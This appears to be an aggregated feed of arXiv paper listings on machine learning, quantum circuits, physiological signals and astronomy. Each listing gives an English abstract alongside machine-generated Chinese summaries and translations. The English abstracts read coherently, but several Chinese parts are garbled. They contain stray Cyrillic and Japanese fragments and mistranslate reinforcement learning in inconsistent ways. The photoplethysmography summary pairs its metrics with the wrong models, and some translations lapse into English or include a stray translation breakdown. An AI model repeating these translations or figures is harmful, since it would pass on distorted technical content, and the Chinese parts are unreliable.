paper_url: http://arxiv.org/abs/2307.08796
repo_url: https://github.com/denisilie94/incoherent-kernel-dictionary-learning
paper_authors: Denis C. Ilie-Ablachim, Bogdan Dumitrescu
for: 这个论文提出了一种基于字典学习（DL）的新的分类方法。
methods: 该方法使用了一种基于kernel的协方差DL，与标准线性版本的DL进行比较。此外，我们还提出了AK-SVD算法中的表示更新改进。
results: 我们对多个流行的分类问题数据库进行了测试，并得到了优秀的结果。

Abstract
In this paper we present a new classification method based on Dictionary Learning (DL). The main contribution consists of a kernel version of incoherent DL, derived from its standard linear counterpart. We also propose an improvement of the AK-SVD algorithm concerning the representation update. Our algorithms are tested on several popular databases of classification problems.

摘要
在这篇论文中，我们提出了一种基于词典学习（DL）的新的分类方法。我们的主要贡献是基于 стандар的线性DL的kernel版本。此外，我们还提出了对AK-SVD算法的表示更新方法。我们的算法在一些流行的分类问题数据库上进行了测试。Here's a breakdown of the translation:* "In this paper" becomes "在这篇论文中"* "we present" becomes "我们提出"* "a new classification method" becomes "一种新的分类方法"* "based on Dictionary Learning (DL)" becomes "基于词典学习（DL）"* "The main contribution consists of" becomes "主要贡献是"* "a kernel version of incoherent DL" becomes "基于stanдар的线性DL的kernel版本"* "derived from its standard linear counterpart" becomes "从其标准线性对应部分 derivated"* "We also propose an improvement of the AK-SVD algorithm" becomes "此外，我们还提出了对AK-SVD算法的表示更新方法"* "concerning the representation update" becomes "关于表示更新"* "Our algorithms are tested on several popular databases of classification problems" becomes "我们的算法在一些流行的分类问题数据库上进行了测试"

Non-Stationary Policy Learning for Multi-Timescale Multi-Agent Reinforcement Learning

paper_url: http://arxiv.org/abs/2307.08794
repo_url: None
paper_authors: Patrick Emami, Xiangyu Zhang, David Biagioni, Ahmed S. Zamzam
for: This paper is written for learning non-stationary policies in multi-timescale multi-agent reinforcement learning (MARL) environments.
methods: The paper proposes a simple framework for learning non-stationary policies, using available information about agent timescales to define a periodic time encoding. The proposed algorithm uses phase-functioned neural networks to parameterize the actor and critic, providing an inductive bias for periodicity.
results: The paper demonstrates the effectiveness of the proposed framework in learning multi-timescale policies through simulations in a gridworld and building energy management environment.

Abstract
In multi-timescale multi-agent reinforcement learning (MARL), agents interact across different timescales. In general, policies for time-dependent behaviors, such as those induced by multiple timescales, are non-stationary. Learning non-stationary policies is challenging and typically requires sophisticated or inefficient algorithms. Motivated by the prevalence of this control problem in real-world complex systems, we introduce a simple framework for learning non-stationary policies for multi-timescale MARL. Our approach uses available information about agent timescales to define a periodic time encoding. In detail, we theoretically demonstrate that the effects of non-stationarity introduced by multiple timescales can be learned by a periodic multi-agent policy. To learn such policies, we propose a policy gradient algorithm that parameterizes the actor and critic with phase-functioned neural networks, which provide an inductive bias for periodicity. The framework's ability to effectively learn multi-timescale policies is validated on a gridworld and building energy management environment.

摘要
在多时间步骤多代理人学习（MARL）中，代理人在不同的时间步骤之间互动。一般来说，由多个时间步骤引起的政策是非站立的。学习非站立政策具有挑战性，通常需要复杂或不fficient的算法。由实际世界中复杂系统中的控制问题的普遍性启发了我们，我们提出了一个简单的框架 для学习非站立政策。我们使用代理人的时间步骤信息来定义周期时间编码。在详细的演示中，我们证明了由多个时间步骤引起的非站立效果可以通过周期多代理人政策学习。为学习这种政策，我们提议使用phasic函数神经网络来参数化actor和critic，这些神经网络提供了周期性的偏好。我们的框架能够有效地学习多时间步骤的政策，并在格リッド世界和建筑能源管理环境中验证了其效果。

Quarl: A Learning-Based Quantum Circuit Optimizer

paper_url: http://arxiv.org/abs/2307.10120
repo_url: None
paper_authors: Zikun Li, Jinjun Peng, Yixuan Mei, Sina Lin, Yi Wu, Oded Padon, Zhihao Jia
for: 优化量子Circuit是一个具有很大搜索空间的函数等价Circuit的优化问题，需要应用变换来实现最终性能提高。这篇论文介绍了Quarl，一种基于学习的量子Circuit优化器。
methods: Quarl使用了复制学习（RL）来优化量子Circuit，但RL在量子Circuit优化中存在两个主要挑战：巨大和变化的行动空间，以及非均匀的状态表示。Quarl使用了一种新的神经网络架构和RL训练过程来解决这些问题。
results: 我们的评估显示，Quarl在大多数benchmark Circuit上显著超越了现有的Circuit优化器。另外，Quarl可以学习执行旋转合并，这是现有优化器中的一种复杂、非本地的循环优化。

Abstract
Optimizing quantum circuits is challenging due to the very large search space of functionally equivalent circuits and the necessity of applying transformations that temporarily decrease performance to achieve a final performance improvement. This paper presents Quarl, a learning-based quantum circuit optimizer. Applying reinforcement learning (RL) to quantum circuit optimization raises two main challenges: the large and varying action space and the non-uniform state representation. Quarl addresses these issues with a novel neural architecture and RL-training procedure. Our neural architecture decomposes the action space into two parts and leverages graph neural networks in its state representation, both of which are guided by the intuition that optimization decisions can be mostly guided by local reasoning while allowing global circuit-wide reasoning. Our evaluation shows that Quarl significantly outperforms existing circuit optimizers on almost all benchmark circuits. Surprisingly, Quarl can learn to perform rotation merging, a complex, non-local circuit optimization implemented as a separate pass in existing optimizers.

摘要
优化量子Circuit是一项挑战性的任务，因为函数相同Circuit的搜索空间非常大，并且需要应用变换，暂时降低性能，以达到最终的性能提高。本文介绍Quarl，一种基于学习的量子Circuit优化器。在应用了反射学习（RL）到量子Circuit优化时，存在两个主要挑战：大和变化的动作空间，以及不均匀的状态表示。Quarl通过一种新的神经网络架构和RL训练过程来解决这些问题。我们的神经网络架构将动作空间分解成两个部分，并使用图 нейрон网络来表示状态，两者均受到了认为优化决策可以主要由本地逻辑引导，同时允许全局Circuit范围内的逻辑。我们的评估表明，Quarl在大多数测试Circuit上显著超越了现有的优化器。另外，Quarl还能学习执行旋转合并，这是一项复杂的、非本地Circuit优化，在现有的优化器中实现为单独的一个过程。

A DPLL(T) Framework for Verifying Deep Neural Networks

paper_url: http://arxiv.org/abs/2307.10266
repo_url: https://github.com/dynaroars/neuralsat-solver
paper_authors: Hai Duong, Linhan Li, ThanhVu Nguyen, Matthew Dwyer
for: 这个论文是为了提出一种新的深度神经网络验证方法，帮助检测和修复神经网络中的漏洞和攻击。
methods: 该方法基于DPLL(T)算法，包括冲突学习、抽象和理论解决，可以看作是一种基于SMT的神经网络验证框架。
results: 预liminary结果表明，NeuralSAT прототип与当前领导的状态之间具有竞争力。希望通过优化和工程化，NeuralSAT能够带来现代SAT/SMT解决方案的力量和成功，并推动神经网络验证领域的发展。

Abstract
Deep Neural Networks (DNNs) have emerged as an effective approach to tackling real-world problems. However, like human-written software, automatically-generated DNNs can have bugs and be attacked. This thus attracts many recent interests in developing effective and scalable DNN verification techniques and tools. In this work, we introduce a NeuralSAT, a new constraint solving approach to DNN verification. The design of NeuralSAT follows the DPLL(T) algorithm used modern SMT solving, which includes (conflict) clause learning, abstraction, and theory solving, and thus NeuralSAT can be considered as an SMT framework for DNNs. Preliminary results show that the NeuralSAT prototype is competitive to the state-of-the-art. We hope, with proper optimization and engineering, NeuralSAT will carry the power and success of modern SAT/SMT solvers to DNN verification. NeuralSAT is avaliable from: https://github.com/dynaroars/neuralsat-solver

摘要
深度神经网络（DNN）已成为解决现实世界问题的有效方法。然而，如人工写的软件一样，自动生成的 DNN 也可能具有错误和攻击性。这引起了许多最近的关注，旨在开发有效和扩展性的 DNN 验证技术和工具。在这项工作中，我们介绍了一种名为 NeuralSAT 的新的约束解决方法。NeuralSAT 的设计基于现代 SMT 解决方法中的 DPLL(T) 算法，包括（冲突）条件学习、抽象和理论解决，因此 NeuralSAT 可以视为 DNN 的 SMT 框架。初步结果表明，NeuralSAT 原型在竞争力方面与现状保持紧密。我们希望，通过适当的优化和工程，NeuralSAT 能够将现代 SAT/SMT 解决方法的力量和成功带到 DNN 验证中。NeuralSAT 可以从以下地址获取：https://github.com/dynaroars/neuralsat-solver

A mixed policy to improve performance of language models on math problems

paper_url: http://arxiv.org/abs/2307.08767
repo_url: https://github.com/vividitytech/math_lm_rl
paper_authors: Gang Chen
for: 解决 math 问题时，语言模型通常采用采样策略来预测下一个词的 conditional probabilities。但是，在 math 理解步骤中，这种方法可能会导致错误答案。因此，我们提出了一种混合策略探索方法，使用 reinforcement learning 解决 math 问题。
methods: 我们提出了一种两级 токен探索策略：抽象级别的策略会根据概率采样下一个 токен是操作符或操作数，而第二级是具有最高分的循环采集策略。
results: 我们在 GSM8K 数据集上测试了我们的方法，使用 GPT-2 模型，并证明了更高于 $2%$ 的性能提升。我们的实现可以在 https://github.com/vividitytech/math_lm_rl 上找到。

Abstract
When to solve math problems, most language models take a sampling strategy to predict next word according conditional probabilities. In the math reasoning step, it may generate wrong answer. Considering math problems are deterministic, we propose a mixed policy exploration approach to solve math problems with reinforcement learning. In peculiar, we propose a two level token exploration policy: the abstract level explores next token with probability and the second level is deterministic. Specifically, the abstract level policy will decide whether the token is operator or operand with probability sampling, while the second level is deterministic to select next token with the highest score in a greedy way. We test our method on GSM8K dataset with GPT-2 model, and demonstrate more than $2\%$ performance gain. Our implementation is available at https://github.com/vividitytech/math_lm_rl.

摘要
当解决数学问题时，大多数语言模型采取采样策略来预测下一个词的条件概率。在数学逻辑步骤中，它可能生成错误答案。考虑到数学问题是deterministic的，我们提议一种混合策略探索方法来解决数学问题使用再征学习。具体来说，我们提议一个两级符号探索策略：第一级是概率采样，第二级是决定性选择下一个符号的最高分。 Specifically, the first-level policy will decide whether the token is an operator or an operand with probability sampling, while the second level is deterministic to select the next token with the highest score in a greedy way. We test our method on GSM8K dataset with GPT-2 model, and demonstrate more than 2% performance gain. Our implementation is available at .

Quality Assessment of Photoplethysmography Signals For Cardiovascular Biomarkers Monitoring Using Wearable Devices

paper_url: http://arxiv.org/abs/2307.08766
repo_url: None
paper_authors: Felipe M. Dias, Marcelo A. F. Toledo, Diego A. C. Cardenas, Douglas A. Almeida, Filipe A. C. Oliveira, Estela Ribeiro, Jose E. Krieger, Marco A. Gutierrez
for: 这个研究用于评估光学 Plethysmography (PPG) 信号质量，以提高血液征分和征识Cardiovascular 健康。
methods: 这个研究使用了机器学习算法（包括XGBoost、CatBoost和Random Forest）来训练27个统计特征从PPG信号中提取出高质量和低质量的PPG信号。
results: 研究发现，使用这些机器学习模型可以达到Se、PPV和F1-score的94.4、95.6和95.0，94.7、95.9和95.3，93.7、91.3和92.5，分别。这些结果与文献中的状态作准比较，表明机器学习模型可以用于开发远程、非侵入式和连续测量设备。

Abstract
Photoplethysmography (PPG) is a non-invasive technology that measures changes in blood volume in the microvascular bed of tissue. It is commonly used in medical devices such as pulse oximeters and wrist worn heart rate monitors to monitor cardiovascular hemodynamics. PPG allows for the assessment of parameters (e.g., heart rate, pulse waveform, and peripheral perfusion) that can indicate conditions such as vasoconstriction or vasodilation, and provides information about microvascular blood flow, making it a valuable tool for monitoring cardiovascular health. However, PPG is subject to a number of sources of variations that can impact its accuracy and reliability, especially when using a wearable device for continuous monitoring, such as motion artifacts, skin pigmentation, and vasomotion. In this study, we extracted 27 statistical features from the PPG signal for training machine-learning models based on gradient boosting (XGBoost and CatBoost) and Random Forest (RF) algorithms to assess quality of PPG signals that were labeled as good or poor quality. We used the PPG time series from a publicly available dataset and evaluated the algorithm s performance using Sensitivity (Se), Positive Predicted Value (PPV), and F1-score (F1) metrics. Our model achieved Se, PPV, and F1-score of 94.4, 95.6, and 95.0 for XGBoost, 94.7, 95.9, and 95.3 for CatBoost, and 93.7, 91.3 and 92.5 for RF, respectively. Our findings are comparable to state-of-the-art reported in the literature but using a much simpler model, indicating that ML models are promising for developing remote, non-invasive, and continuous measurement devices.

摘要
photoplethysmography (PPG) 是一种不侵入性技术，用于测量血液Volume在微血管细胞床中的变化。它通常用于医疗器械 such as pulse oximeters和背部搭载的心率测量仪器来监测Cardiovascular hemodynamics。 PPG 可以评估参数（例如心率、脉冲形态和血液径流），这些参数可能会指示condition such as vasoconstriction or vasodilation，并提供关于微血管血液流动的信息，使其成为监测Cardiovascular health 的有用工具。然而，PPG 受到多种源的变化的影响，特别是在使用 wearable device 进行连续监测时，如运动 artifacts、皮肤颜色和血管运动。在这项研究中，我们从 PPG 信号中提取了27个统计特征，用于训练机器学习模型，包括梯度提升（XGBoost和CatBoost）和随机森（RF）算法。我们使用公共可用的 PPG 时间序列数据集，并使用 Se、Positive Predicted Value（PPV）和 F1-score（F1） metric 评估算法的性能。我们的模型实现了 Se、PPV 和 F1-score 的94.4、95.6和95.0，XGBoost 的94.7、95.9和95.3，CatBoost 的93.7、91.3和92.5，RF 的93.7、91.3和92.5。我们的发现与文献中的状态Of-the-art相似，但使用更简单的模型， indicating that ML models are promising for developing remote, non-invasive, and continuous measurement devices。

A Novel Application of Conditional Normalizing Flows: Stellar Age Inference with Gyrochronology

paper_url: http://arxiv.org/abs/2307.08753
repo_url: None
paper_authors: Phil Van-Lane, Joshua S. Speagle, Stephanie Douglas
for: 用于推算低质量主序星的年龄
methods: 使用机器学习技术进行Conditional Normalizing Flows分析光谱数据
results: 实现了与文献值相符的年龄估算，并且提供了一种可靠的数据驱动的星系年龄推算方法

Abstract
Stellar ages are critical building blocks of evolutionary models, but challenging to measure for low mass main sequence stars. An unexplored solution in this regime is the application of probabilistic machine learning methods to gyrochronology, a stellar dating technique that is uniquely well suited for these stars. While accurate analytical gyrochronological models have proven challenging to develop, here we apply conditional normalizing flows to photometric data from open star clusters, and demonstrate that a data-driven approach can constrain gyrochronological ages with a precision comparable to other standard techniques. We evaluate the flow results in the context of a Bayesian framework, and show that our inferred ages recover literature values well. This work demonstrates the potential of a probabilistic data-driven solution to widen the applicability of gyrochronological stellar dating.

摘要
星系年龄是进化模型的关键构建块，但低质量主序星测量具有挑战。未经探索的解决方案在这个领域是通过潜在机器学习方法进行gyrochronology，这是特别适用于这些星体的星年龄测量技术。虽然精确的分析gyrochronological模型具有挑战，但我们在光度测量数据上应用条件正常流，并示出了一种数据驱动的方法可以与其他标准技术相比的精度来限制gyrochronological年龄。我们在bayesian框架下评估流果，并发现我们的推断年龄与文献值很好地匹配。这种工作示出了潜在的数据驱动probabilistic解决方案可以扩展gyrochronological星年龄测量的应用范围。

Flow Matching in Latent Space

paper_url: http://arxiv.org/abs/2307.08698
repo_url: https://github.com/vinairesearch/lfm
paper_authors: Quan Dao, Hao Phung, Binh Nguyen, Anh Tran
for: train generative models with improved computational efficiency and scalability for high-resolution image synthesis
methods: apply flow matching in the latent spaces of pretrained autoencoders, integrate various conditions for conditional generation tasks
results: effective in both quantitative and qualitative results on various datasets, provide theoretical control of the Wasserstein-2 distance between the reconstructed latent flow distribution and true data distribution

Abstract
Flow matching is a recent framework to train generative models that exhibits impressive empirical performance while being relatively easier to train compared with diffusion-based models. Despite its advantageous properties, prior methods still face the challenges of expensive computing and a large number of function evaluations of off-the-shelf solvers in the pixel space. Furthermore, although latent-based generative methods have shown great success in recent years, this particular model type remains underexplored in this area. In this work, we propose to apply flow matching in the latent spaces of pretrained autoencoders, which offers improved computational efficiency and scalability for high-resolution image synthesis. This enables flow-matching training on constrained computational resources while maintaining their quality and flexibility. Additionally, our work stands as a pioneering contribution in the integration of various conditions into flow matching for conditional generation tasks, including label-conditioned image generation, image inpainting, and semantic-to-image generation. Through extensive experiments, our approach demonstrates its effectiveness in both quantitative and qualitative results on various datasets, such as CelebA-HQ, FFHQ, LSUN Church & Bedroom, and ImageNet. We also provide a theoretical control of the Wasserstein-2 distance between the reconstructed latent flow distribution and true data distribution, showing it is upper-bounded by the latent flow matching objective. Our code will be available at https://github.com/VinAIResearch/LFM.git.

摘要
“流匹配”是一种最近的框架，用于训练生成模型，具有印象性的实验性能，而且训练更容易。然而，之前的方法仍面临computational expensive和大量的函数评估问题在像素空间中。另外，Latent-based生成方法在最近几年内表现出色，但这种模型类型在这个领域仍然未得到充分的探索。在这种工作中，我们提议在预训练 autoencoder 的 latent space 中应用流匹配，这可以提高计算效率和可扩展性，用于高分辨率图像生成。这种方法可以在受限的计算资源上进行流匹配训练，同时保持图像质量和灵活性。此外，我们的工作是在 flow matching 中 интеGRATION 多种条件的先驱性贡献，包括标签条件图像生成、图像填充和semantic-to-image生成。通过广泛的实验，我们的方法在多个数据集上表现出色，如 CelebA-HQ、FFHQ、LSUN Church & Bedroom 和 ImageNet。我们还提供了 Wasserstein-2 距离真实数据分布和重建 latent flow 分布的理论控制，证明它是上界。我们的代码将可以在 GitHub 上获得：https://github.com/VinAIResearch/LFM.git。

A Multiobjective Reinforcement Learning Framework for Microgrid Energy Management

paper_url: http://arxiv.org/abs/2307.08692
repo_url: None
paper_authors: M. Vivienne Liu, Patrick M. Reed, David Gold, Garret Quist, C. Lindsay Anderson
for: 提供一种解决多目标冲突的微grid操作方法
methods: 利用外生信息和数据驱动学习来探索高维目标空间，找到多目标之间的补做
results: 比Status quo操作更高效，提供多样化、适应性和可解释的操作方法

Abstract
The emergence of microgrids (MGs) has provided a promising solution for decarbonizing and decentralizing the power grid, mitigating the challenges posed by climate change. However, MG operations often involve considering multiple objectives that represent the interests of different stakeholders, leading to potentially complex conflicts. To tackle this issue, we propose a novel multi-objective reinforcement learning framework that explores the high-dimensional objective space and uncovers the tradeoffs between conflicting objectives. This framework leverages exogenous information and capitalizes on the data-driven nature of reinforcement learning, enabling the training of a parametric policy without the need for long-term forecasts or knowledge of the underlying uncertainty distribution. The trained policies exhibit diverse, adaptive, and coordinative behaviors with the added benefit of providing interpretable insights on the dynamics of their information use. We employ this framework on the Cornell University MG (CU-MG), which is a combined heat and power MG, to evaluate its effectiveness. The results demonstrate performance improvements in all objectives considered compared to the status quo operations and offer more flexibility in navigating complex operational tradeoffs.

摘要
随着微型电网（MG）的出现，为了解决气候变化所带来的挑战，提供了一个有前途的解决方案，即减少和分散电力网络。然而，MG的运营通常需要考虑多个目标，这些目标代表不同的利益相互之间的矛盾，这可能会导致复杂的冲突。为了解决这个问题，我们提出了一种新的多目标学习框架，该框架可以探索高维目标空间中的交叉关系，并揭示不同目标之间的负担变化。这种框架利用外生信息，并利用学习的数据驱动特性，可以在不需要长期预测或者知道下游不确定分布的情况下，训练一个参数化策略。训练出来的策略具有多样化、适应性和协调性，同时还提供了可解释的动态信息使用动态。我们在康奈尔大学微型电网（CU-MG）上使用这种框架进行评估，结果表明，相比Status quo操作，我们的方法可以提高所有考虑的目标的性能，并提供更多的操作复杂关系的灵活性。

FlashAttention-2: Faster Attention with Better Parallelism and Work Partitioning

paper_url: http://arxiv.org/abs/2307.08691
repo_url: https://github.com/dao-ailab/flash-attention
paper_authors: Tri Dao
for: 提高Transformers的Sequence length scaling，以提高语言模型和高分辨率图像理解的性能，以及开启代码、音频和视频生成等新应用。
methods: 利用GPU内存层次结构，实现 linear 而不是 quadratic 的内存占用和运行时间减速，无需 aproximation。
results: 对比于优化baselines，FlashAttention-2可以达到2-4倍的运行时间减速，并且在A100 GPU上达到50-73%的理论最大FLOPs/s，接近GEMM操作的效率。

Abstract
Scaling Transformers to longer sequence lengths has been a major problem in the last several years, promising to improve performance in language modeling and high-resolution image understanding, as well as to unlock new applications in code, audio, and video generation. The attention layer is the main bottleneck in scaling to longer sequences, as its runtime and memory increase quadratically in the sequence length. FlashAttention exploits the asymmetric GPU memory hierarchy to bring significant memory saving (linear instead of quadratic) and runtime speedup (2-4$\times$ compared to optimized baselines), with no approximation. However, FlashAttention is still not nearly as fast as optimized matrix-multiply (GEMM) operations, reaching only 25-40\% of the theoretical maximum FLOPs/s. We observe that the inefficiency is due to suboptimal work partitioning between different thread blocks and warps on the GPU, causing either low-occupancy or unnecessary shared memory reads/writes. We propose FlashAttention-2, with better work partitioning to address these issues. In particular, we (1) tweak the algorithm to reduce the number of non-matmul FLOPs (2) parallelize the attention computation, even for a single head, across different thread blocks to increase occupancy, and (3) within each thread block, distribute the work between warps to reduce communication through shared memory. These yield around 2$\times$ speedup compared to FlashAttention, reaching 50-73\% of the theoretical maximum FLOPs/s on A100 and getting close to the efficiency of GEMM operations. We empirically validate that when used end-to-end to train GPT-style models, FlashAttention-2 reaches training speed of up to 225 TFLOPs/s per A100 GPU (72\% model FLOPs utilization).

摘要
缩放变换器在更长的序列长度上进行缩放是过去几年内的一个主要问题，承诺改进语言模型和高分辨率图像理解的性能，以及开启新的代码、音频和视频生成应用。注意层是缩放到更长序列的主要瓶颈，因为它的运行时间和内存增长为序列长度的平方。 FlashAttention 利用了 GPU 内存层次结构的非对称性，实现了重要的内存减少（线性而不是平方）和运行时间加速（2-4倍于优化基线），无需折衣。然而，FlashAttention 仍然不够快，只达到了25-40%的理论最大 FLOPs/s。我们发现，这是由不佳的工作分配导致的，包括在 GPU 中的不同线程块和批处理中的低占用或 Shared 内存中的不必要读写。我们提议 FlashAttention-2，它通过改进工作分配来解决这些问题。具体来说，我们（1）修改算法，减少非 matrix-multiply FLOPs;（2）在单个头上并行执行注意计算，以增加占用率;（3）在每个线程块中，分配工作 между批处理，以减少通信过 Shared 内存。这些提高了约 2 倍的速度，达到 50-73% 的理论最大 FLOPs/s 在 A100 上，与 GEMM 操作的效率相似。我们经验 validate 了，当用于 Train GPT-style 模型时，FlashAttention-2 的训练速度可达 225 TFLOPs/s per A100 GPU (72% 模型 FLOPs 利用率)。

COLLIE: Systematic Construction of Constrained Text Generation Tasks

paper_url: http://arxiv.org/abs/2307.08689
repo_url: https://github.com/princeton-nlp/Collie
paper_authors: Shunyu Yao, Howard Chen, Austin W. Hanjie, Runzhe Yang, Karthik Narasimhan
for: 本研究旨在提供一种 grammar-based 框架，用于 specifying 复杂的、compositional 约束，以便在自然语言处理中进行 Text generation under constraints。
methods: 本研究使用了 grammar-based 框架 COLLIE，可以Specify 多种层次的约束（word、sentence、paragraph、passage）和模型挑战（语言理解、逻辑推理、计数、semantic planning）。此外，还开发了一些自动提取任务实例的工具，以便使用 COLLIE 进行数据生成。
results: 通过使用 COLLIE，研究人员编译了 COLLIE-v1 数据集，包含 2080 个任务实例，其中每个任务实例包含 13 种约束结构。通过对 five 种 instruction-tuned 语言模型进行系统性的实验和分析，发现这些模型在处理 COLLIE 数据集时存在缺陷。 COLLIE 框架设计为轻量级和可扩展，希望社区可以通过开发更复杂的约束和评价方法来进一步提高自然语言处理技术。

Abstract
Text generation under constraints have seen increasing interests in natural language processing, especially with the rapidly improving capabilities of large language models. However, existing benchmarks for constrained generation usually focus on fixed constraint types (e.g.,generate a sentence containing certain words) that have proved to be easy for state-of-the-art models like GPT-4. We present COLLIE, a grammar-based framework that allows the specification of rich, compositional constraints with diverse generation levels (word, sentence, paragraph, passage) and modeling challenges (e.g.,language understanding, logical reasoning, counting, semantic planning). We also develop tools for automatic extraction of task instances given a constraint structure and a raw text corpus. Using COLLIE, we compile the COLLIE-v1 dataset with 2080 instances comprising 13 constraint structures. We perform systematic experiments across five state-of-the-art instruction-tuned language models and analyze their performances to reveal shortcomings. COLLIE is designed to be extensible and lightweight, and we hope the community finds it useful to develop more complex constraints and evaluations in the future.

摘要
文本生成 unter constraint 已经受到了自然语言处理领域的越来越多的关注，尤其是大语言模型的能力在不断提高。然而，现有的受制定生成标准通常围绕固定的约束类型（例如，生成包含某些词的句子），这些约束已经证明容易 для当前的模型 like GPT-4。我们提出了 COLLIE，一个基于语法的框架，允许指定Rich和多层次的 compositional 约束（单词、句子、段落、段落），以及模型挑战（例如，语言理解、逻辑推理、计数、semantic planning）。我们还开发了自动提取 task instance 的工具，基于约束结构和原始文本库。使用 COLLIE，我们编译了 COLLIE-v1 数据集，包含 2080 个实例，其中 13 种约束结构。我们在五种状态atracking 语言模型上进行了系统性的实验，并分析其性能，以揭示缺陷。COLLIE 是可扩展和轻量级的，我们希望社区能够在未来开发更复杂的约束和评价。

An R package for parametric estimation of causal effects

paper_url: http://arxiv.org/abs/2307.08686
repo_url: None
paper_authors: Joshua Wolff Anderson, Cyril Rakovski
for: 本文旨在介绍R包CausalModels，用于估计 causal effect。
methods: 本文使用了一些常见的统计方法，包括标准化、IP重み、G估计、结果回归、工具变量和投影匹配等。
results: 本文提供了一个简单和可访问的框架，可以在R中对不同的统计方法进行集成，用于估计 causal effect。Note: The above text is in Simplified Chinese.

Abstract
This article explains the usage of R package CausalModels, which is publicly available on the Comprehensive R Archive Network. While packages are available for sufficiently estimating causal effects, there lacks a package that provides a collection of structural models using the conventional statistical approach developed by Hernan and Robins (2020). CausalModels addresses this deficiency of software in R concerning causal inference by offering tools for methods that account for biases in observational data without requiring extensive statistical knowledge. These methods should not be ignored and may be more appropriate or efficient in solving particular problems. While implementations of these statistical models are distributed among a number of causal packages, CausalModels introduces a simple and accessible framework for a consistent modeling pipeline among a variety of statistical methods for estimating causal effects in a single R package. It consists of common methods including standardization, IP weighting, G-estimation, outcome regression, instrumental variables and propensity matching.

摘要

A Rubik’s Cube inspired approach to Clifford synthesis

paper_url: http://arxiv.org/abs/2307.08684
repo_url: https://github.com/gshartnett/rubiks-clifford-synthesis
paper_authors: Ning Bao, Gavin S. Hartnett
for: 解决Clifford元素的分解问题，即Clifford合成问题。
methods: 采用机器学习方法，基于距离标准的近似来实现Clifford合成。
results: 比现有算法更具有灵活性，可以适应特定设备的gate集、设备拓扑和gate精度。

Abstract
The problem of decomposing an arbitrary Clifford element into a sequence of Clifford gates is known as Clifford synthesis. Drawing inspiration from similarities between this and the famous Rubik's Cube problem, we develop a machine learning approach for Clifford synthesis based on learning an approximation to the distance to the identity. This approach is probabilistic and computationally intensive. However, when a decomposition is successfully found, it often involves fewer gates than existing synthesis algorithms. Additionally, our approach is much more flexible than existing algorithms in that arbitrary gate sets, device topologies, and gate fidelities may incorporated, thus allowing for the approach to be tailored to a specific device.

摘要
“把任意的克利福德元素分解成克利福德门的序列是称为克利福德合成的问题。 Drawing inspiration from类似于这和著名的聂隐秘 куби cura问题，我们开发了基于学习距离Identidade的机器学习方法 для克利福德合成。 This approach是 probabilistic和 computationally intensive。 however，当一个分解成功时，它通常具有 fewer gates than existing synthesis algorithms。 In addition， our approach is much more flexible than existing algorithms in that arbitrary gate sets, device topologies, and gate fidelities may be incorporated， thus allowing for the approach to be tailored to a specific device.”Note that Simplified Chinese is the standard writing system used in mainland China, and it may be different from Traditional Chinese, which is used in Taiwan and other parts of the world.

Do Models Explain Themselves? Counterfactual Simulatability of Natural Language Explanations

paper_url: http://arxiv.org/abs/2307.08678
repo_url: None
paper_authors: Yanda Chen, Ruiqi Zhong, Narutatsu Ri, Chen Zhao, He He, Jacob Steinhardt, Zhou Yu, Kathleen McKeown
for: 这个论文旨在研究大型自然语言模型（LLM）是否可以解释自己的决策过程。
methods: 作者提出了评估对natural language explanation的counterfactual simulatability，以测试LLM是否可以帮助人类构建模型处理不同输入的MENTAL MODEL。
results: 研究发现，LLM的解释具有低精度和不符合可能性，因此直接优化人类批准（例如RLHF）可能并不是 suficient solution。

Abstract
Large language models (LLMs) are trained to imitate humans to explain human decisions. However, do LLMs explain themselves? Can they help humans build mental models of how LLMs process different inputs? To answer these questions, we propose to evaluate $\textbf{counterfactual simulatability}$ of natural language explanations: whether an explanation can enable humans to precisely infer the model's outputs on diverse counterfactuals of the explained input. For example, if a model answers "yes" to the input question "Can eagles fly?" with the explanation "all birds can fly", then humans would infer from the explanation that it would also answer "yes" to the counterfactual input "Can penguins fly?". If the explanation is precise, then the model's answer should match humans' expectations. We implemented two metrics based on counterfactual simulatability: precision and generality. We generated diverse counterfactuals automatically using LLMs. We then used these metrics to evaluate state-of-the-art LLMs (e.g., GPT-4) on two tasks: multi-hop factual reasoning and reward modeling. We found that LLM's explanations have low precision and that precision does not correlate with plausibility. Therefore, naively optimizing human approvals (e.g., RLHF) may not be a sufficient solution.

摘要
大型自然语言模型（LLM）在训练时尝试模仿人类的决策，但是 LLM 是否能够解释自己的处理逻辑？可以使用 counterfactual simulatability 来评估 LLM 的解释能力。我们定义 counterfactual simulatability 为：一个解释是否能够帮助人类建立模型处理输入的精准模型。例如，如果一个模型对 input 问题 "Can eagles fly?" 的答案是 "yes"，并且提供解释 "all birds can fly"，那么人类就可以从解释中推断出模型对 counterfactual input "Can penguins fly?" 的答案是什么。如果解释准确，那么模型的答案应该与人类的预期相符。为了评估 LLM 的 counterfactual simulatability，我们提出了两种指标：精度和通用性。我们使用 LLM 自动生成了多个 counterfactual，然后使用这些指标来评估当前 state-of-the-art LLM （例如 GPT-4）在 multi-hop factual reasoning 和 reward modeling 两个任务上的表现。我们发现 LLM 的解释准确率很低，而且准确率与可能性无关。因此，直接优化人类的批准（例如 RLHF）可能并不是一个充分的解决方案。

TableGPT: Towards Unifying Tables, Nature Language and Commands into One GPT

paper_url: http://arxiv.org/abs/2307.08674
repo_url: None
paper_authors: Liangyu Zha, Junlin Zhou, Liyao Li, Rui Wang, Qingyi Huang, Saisai Yang, Jing Yuan, Changbao Su, Xiang Li, Aofeng Su, Tao Zhang, Chen Zhou, Kaizhe Shou, Miao Wang, Wufang Zhu, Guoshan Lu, Chao Ye, Yali Ye, Wentao Ye, Yiming Zhang, Xinglong Deng, Jie Xu, Haobo Wang, Gang Chen, Junbo Zhao
for: 论文旨在提供一个可以通过自然语言输入操作表格的框架，使用大语言模型（LLMs）来理解和处理表格。
methods: 该框架基于全新的全球表格表示方式，通过同时训练 LLMs 在表格和文本模式之间，以便它们能够深入理解表格数据并在指令链中执行复杂的操作。
results: TableGPT 可以提供简单易用的表格操作方式，包括问答、数据操作、数据可视化、分析报告生成和自动预测等，从而为用户提供更多的便利和访问ibilty。

Abstract
